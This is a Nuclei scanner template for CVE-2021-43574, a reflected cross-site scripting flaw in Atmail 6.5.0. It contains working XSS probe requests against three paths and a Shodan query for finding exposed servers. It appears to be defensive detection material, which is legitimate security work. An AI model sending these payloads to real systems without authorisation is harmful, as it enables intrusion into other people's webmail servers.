nuclei-templates/http/cves/2021/CVE-2021-43574.yaml

57 lines
1.9 KiB
YAML
Raw Normal View History

2022-09-01 06:16:54 +00:00
id: CVE-2021-43574
info:
name: Atmail 6.5.0 - Cross-Site Scripting
2022-09-01 06:34:48 +00:00
author: arafatansari,ritikchaddha
severity: medium
2022-09-01 06:16:54 +00:00
description: |
Atmail 6.5.0 contains a cross-site scripting vulnerability in WebAdmin Control Pane via the format parameter to the default URI, which allows remote attackers to inject arbitrary web script or HTML via the “format” parameter.
2023-09-06 12:09:01 +00:00
remediation: |
Apply the latest security patches or updates provided by Atmail to fix the XSS vulnerability.
2022-09-01 06:16:54 +00:00
reference:
- https://medium.com/@bhattronit96/cve-2021-43574-696041dcab9e
- https://help.atmail.com/hc/en-us/sections/115003283988
- https://nvd.nist.gov/vuln/detail/CVE-2021-43574
2022-09-01 06:34:48 +00:00
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2021-43574
cwe-id: CWE-79
2023-07-11 19:49:27 +00:00
epss-score: 0.00145
epss-percentile: 0.50174
2023-09-06 12:09:01 +00:00
cpe: cpe:2.3:a:atmail:atmail:6.5.0:*:*:*:*:*:*:*
2022-09-01 06:16:54 +00:00
metadata:
2023-06-04 08:13:42 +00:00
verified: true
2023-09-06 12:09:01 +00:00
max-request: 3
2023-07-11 19:49:27 +00:00
vendor: atmail
product: atmail
2023-09-06 12:09:01 +00:00
shodan-query: http.html:"Powered by Atmail"
2022-09-01 06:34:48 +00:00
tags: cve,cve2021,atmail,xss
2022-09-01 06:16:54 +00:00
http:
2022-09-01 06:34:48 +00:00
- method: GET
path:
- "{{BaseURL}}/?format=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
- "{{BaseURL}}/atmail/?format=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
- "{{BaseURL}}/atmail/webmail/?format=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
2022-09-01 06:16:54 +00:00
2022-09-01 06:34:48 +00:00
stop-at-first-match: true
2023-07-11 19:49:27 +00:00
2022-09-01 06:16:54 +00:00
matchers-condition: and
matchers:
2022-09-01 06:34:48 +00:00
- type: word
part: body
words:
- '<script>alert(document.domain)</script>" does not exist'
2022-09-01 06:16:54 +00:00
- type: word
2022-09-01 06:34:48 +00:00
part: header
2022-09-01 06:16:54 +00:00
words:
2022-09-01 06:34:48 +00:00
- text/html
- type: status
status:
- 500
- 403
condition: or
# digest: 4b0a00483046022100b66a5dacd611292ff541f589f3352f9da062980d7538a36ef688d6d4f799ddab022100a4e03c2e8d156db9e9c43c7535c979fc7f812dea71f8d4833d903b30cc73b590:922c64590222798bb761d5b6d8e72950